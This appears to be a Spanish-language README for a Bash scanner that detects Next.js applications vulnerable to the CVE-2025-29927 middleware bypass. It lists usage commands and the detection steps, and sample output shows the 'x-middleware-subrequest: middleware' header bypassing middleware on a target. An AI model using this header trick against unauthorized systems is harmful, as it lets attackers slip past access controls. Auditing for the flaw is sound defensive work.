
CVE-2025-29927 Comprobador de exploits
Herramienta automatizada en Bash para detectar aplicaciones Next.js vulnerables al bypass de middleware CVE-2025-29927, según la investigación de Zhero Web Security.
bashwhatwebcurlInstálalos en Debian/Ubuntu con:
sudo apt install whatweb curl
./CVE-2025-29927.sh -u https://example.com
Crea un archivo urls.txt con una URL por línea:
https://target1.com
https://target2.com
Ejecuta:
./nextjs_bypass_checker_v2.sh -l urls.txt
Identificación de Next.js
whatweb para detectar la tecnología./_next/static/BUILD_ID y _buildManifest.js.Detección de Middleware
X-Middleware-RewriteX-Middleware-Set-CookiePrueba de bypass
x-middleware-subrequest y se detectan cabeceras.[*] Analizando: https://victima.com
[+] WhatWeb:
-> Detectado: Next.js[12.2.0]
[+] BUILD_ID: 3fjd92hf8
[+] Versión detectada: 12.2.0
[+] Middleware activo (cabeceras detectadas):
X-Middleware-Rewrite: /not-found/locale=en
[+] Probando exploits:
-> x-middleware-subrequest: middleware -> ✅ BYPASS EXITOSO (cabeceras desaparecieron)
-> x-middleware-subrequest: src/middleware -> ❌ Middleware no evadido
[*] Finalizado: https://victima.com
Este script es para fines educativos y de auditoría autorizada. No lo utilices contra objetivos sin consentimiento. El uso indebido puede constituir una actividad ilegal.
Basado en la investigación de: Zhero Web Security